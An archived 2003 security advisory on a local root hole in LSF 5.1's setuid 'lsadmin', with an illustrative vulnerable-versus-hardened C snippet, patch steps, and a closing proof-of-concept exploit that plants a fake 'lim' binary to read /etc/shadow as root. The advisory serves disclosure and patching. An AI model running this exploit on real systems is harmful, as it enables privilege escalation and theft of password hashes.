Security advisory: LSF 5.1 local root exploit

From: Tomasz Grabowski (cadenceat_private)
Date: Thu May 22 2003 - 06:31:22 PDT


    	             Security Advisory
    
    	                22 May 2003
    
    	           Local root in LSF 5.1
    
    
    Name:            Load Sharing Facility version 5.1
    Severity:        High
    Vendor URL:      http://www.platform.com
    Author:          Tomasz Grabowski (cadenceat_private)
    Vendor notified: 25 Feb 2003
    Vendor response: 25 Feb 2003
    Vendor fix:      19 Mar 2003
    
    Commercial:      I'm looking for a new job
    
    
    Impact: A local attacker can gain root privileges by forcing the
    	'lsadmin' binary, which is setuid root, to execute code of the
    	attacker's choice.
    
    
    Description:
    
    The 'lsadmin' binary has a "ckconfig" command that checks the
    correctness of the LSF configuration files. Shortly after start-up it
    runs the external 'lim' binary, and it takes the directory in which to
    look for 'lim' from the LSF_SERVERDIR variable in lsf.conf. A regular
    user can write his own lsf.conf and, by setting the LSF_ENVDIR
    variable, make 'lsadmin' read it instead of the default /etc/lsf.conf.
    The attacker can therefore point LSF_SERVERDIR at a directory holding
    his own 'lim' binary, which 'lsadmin' then executes with its setuid
    root privileges. The proof of concept below shows that exporting
    LSF_SERVERDIR directly in the environment is already enough; no custom
    lsf.conf is needed.
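    The following is an added example, not code from the advisory or from
    Platform's lsadmin. It contrasts the pattern just described (a setuid
    root program taking the location of a helper from a variable the
    invoking user controls) with a hardened lookup that ignores the
    environment while privileged and refuses relative directories
    otherwise. The compiled-in directory /usr/lsf/etc, the function names
    and the return codes are assumptions made for illustration.

```c
/*
 * Added example, not code from the advisory or from Platform's lsadmin.
 * Contrasts the vulnerable lookup of 'lim' via LSF_SERVERDIR with a
 * hardened one. LIM_DEFAULT_DIR, the function names and the return
 * codes are assumptions made for illustration.
 */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define LIM_DEFAULT_DIR "/usr/lsf/etc"   /* assumed build-time location of 'lim' */

/* Vulnerable pattern: the directory comes straight from LSF_SERVERDIR.
 * "export LSF_SERVERDIR=." turns the helper path into "./lim", so a setuid
 * root caller would exec whatever the invoking user put there.
 * Returns 0 and fills 'out', or -1 if the path does not fit. */
int lim_path_unsafe(char *out, size_t n)
{
    const char *dir = getenv("LSF_SERVERDIR");
    int r;
    if (dir == NULL || dir[0] == '\0')
        dir = LIM_DEFAULT_DIR;
    r = snprintf(out, n, "%s/lim", dir);
    return (r < 0 || (size_t)r >= n) ? -1 : 0;
}

/* Hardened pattern, two rules:
 *  1. While running with elevated privileges (real uid != effective uid)
 *     the environment is not consulted at all; the compiled-in directory
 *     is used. The same rule applies to LSF_ENVDIR and any other variable
 *     that selects a file or program the privileged code will open or run.
 *  2. Even when unprivileged, only an absolute directory is accepted, so a
 *     relative value such as "." is refused (-1) rather than silently used.
 * Returns 0 and fills 'out', -1 if the request is refused or does not fit. */
int lim_path_safe(char *out, size_t n, uid_t ruid, uid_t euid)
{
    const char *dir = LIM_DEFAULT_DIR;
    int r;
    if (ruid == euid) {
        const char *env = getenv("LSF_SERVERDIR");
        if (env != NULL && env[0] != '\0') {
            if (env[0] != '/')
                return -1;               /* relative directory: refuse */
            dir = env;
        }
    }
    r = snprintf(out, n, "%s/lim", dir);
    return (r < 0 || (size_t)r >= n) ? -1 : 0;
}

/* Stand-alone demo: plants LSF_SERVERDIR=. as in the advisory and shows
 * what each lookup would execute for the caller's own real/effective uid. */
int main(void)
{
    char path[256];
    setenv("LSF_SERVERDIR", ".", 1);
    if (lim_path_unsafe(path, sizeof path) == 0)
        printf("unsafe lookup would exec: %s\n", path);
    if (lim_path_safe(path, sizeof path, getuid(), geteuid()) == 0)
        printf("safe lookup would exec:   %s\n", path);
    else
        printf("safe lookup refused LSF_SERVERDIR=.\n");
    return 0;
}
```

    Run unprivileged, the demo prints "./lim" for the unsafe lookup and a
    refusal for the safe one; installed setuid root it would print the
    compiled-in /usr/lsf/etc/lim for the safe lookup regardless of what the
    invoking user exported.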
    
    
    How to patch:
    
    1) Download the lsadmin patch from Platform ftp site
    
    ftp ftp.platform.com
    location: /patches/5.1/patch/sup_by_dev33993/
    file: lsadmin5.1_<os>.Z
    
    If you do not have username/password to access ftp.platform.com, contact
    supportat_private
    
    2) In LSF_BINDIR, move the old lsadmin to lsadmin.old. Uncompress the
    downloaded file, rename the resulting binary to lsadmin and move it into
    LSF_BINDIR. Make sure the new binary is owned by root with permissions
    4755. Note that a renamed file keeps its mode, so lsadmin.old is still a
    setuid root copy of the vulnerable binary: strip its setuid bit (chmod
    755 lsadmin.old) or delete it once the new lsadmin has been verified.
    
    For more information on patch or related questions, contact
    supportat_private
    
    
    
    Exploit:
    
    
    # LSF 5.1 'lsadmin' local root exploit
    # 2003.03.20 - CADENCE of Lam3rZ
    
    # Proof of concept - for educational purposes only!
    
    cat <<__END__> attacker_code.c
    /* Planted 'lim': executed as root by the setuid 'lsadmin ckconfig',
     * it copies the first line of /etc/shadow into a scratch file in the
     * current directory as proof of privilege. */
    #include <stdio.h>
    #include <unistd.h>
    int main(void) {
        FILE *secret_file;
        FILE *temp_file;
        char one_line[128];
        setuid(0); setgid(0);        /* make root the real uid/gid, not just effective */
        secret_file = fopen("/etc/shadow", "r");
        temp_file = fopen(".temp.file", "w");
        if (secret_file == NULL || temp_file == NULL)
            return 1;                /* not root, or cwd not writable */
        if (fgets(one_line, sizeof(one_line), secret_file) != NULL)
            fputs(one_line, temp_file);
        fclose(secret_file); fclose(temp_file);
        return 0;
    }
    __END__
    
    gcc attacker_code.c -o lim
    chmod 777 lim
    export LSF_SERVERDIR=.       # lsadmin looks for 'lim' in the current directory
    lsadmin ckconfig             # runs ./lim with effective uid 0
    cat .temp.file               # first line of /etc/shadow
    rm -f attacker_code.c lim .temp.file
    
    
    
    ---
    Tomasz Grabowski  (0-91)4494234
    Akademickie Centrum Informatyki
    mailto:cadenceat_private
    



    This archive was generated by hypermail 2b30 : Thu May 22 2003 - 10:30:27 PDT